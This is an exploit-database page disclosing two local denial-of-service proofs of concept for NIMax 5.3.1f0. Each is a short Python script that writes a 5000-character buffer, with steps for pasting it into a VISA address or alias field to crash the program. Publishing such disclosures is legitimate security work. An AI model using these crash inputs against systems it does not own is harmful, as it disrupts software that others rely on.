NIMax 5.3.1f0 Denial Of Service

2021.10.21
Credit: LinxzSec
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

# Exploit Title: NIMax 5.3.1 - 'Remote VISA System' Denial of Service (PoC) # Date: 24/06/2021 # Exploit Author: LinxzSec # Vulnerability: Local Denial of Service (DoS) # Vendor Homepage: https://www.ni.com/en-gb.html # Software Link: License Required - https://knowledge.ni.com/KnowledgeArticleDetails?id=kA03q000000YGQwCAO&l=en-GB # Tested Version: 5.3.1f0 # Tested On: Windows 10 Pro x64 '''[ POC ] 1 - Copy printed "AAAAA..." string from "nimax.txt" 2 - Open NIMax.exe 3 - Right click "Remote systems" and press "Create New" 4 - Select "Remote VISA System" and press "Next" 5 - Paste clipboard in "Remote VISA System Address" 6 - Press finish and DoS will occur ''' buffer = "\x41" * 5000 try: f = open("nimax.txt", "w") f.write(buffer) f.close() print("[+] File created!") except: print("[+] File could not be created!") ---------- # Exploit Title: NIMax 5.3.1f0 - 'VISA Alias' Denial of Service (PoC) # Date: 24/06/2021 # Exploit Author: LinxzSec # Vulnerability: Local Denial of Service (DoS) # Vendor Homepage: https://www.ni.com/en-gb.html # Software Link: License Required - https://knowledge.ni.com/KnowledgeArticleDetails?id=kA03q000000YGQwCAO&l=en-GB # Tested Version: 5.3.1f0 # Tested On: Windows 10 Pro x64 '''[ POC ] 1 - Copy printed "AAAAA..." string from "nimax.txt" 2 - Open NIMax.exe 3 - Drop down "My System" then drop down "Software" 5 - Locate "NI-VISA 5.2" and select it 6 - Open the "VISA Options" tab 7 - Drop down "General settings" 8 - Select "Aliases" 9 - Select "Add alias" 10 - Paste string from "nimax.txt" into "Resource name" 11 - Just put a single character in the alias and press "ok", DoS will occur ''' buffer = "\x41" * 5000 try: f = open("nimax.txt", "w") f.write(buffer) f.close() print("[+] File created!") except: print("[+] File could not be created!")


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top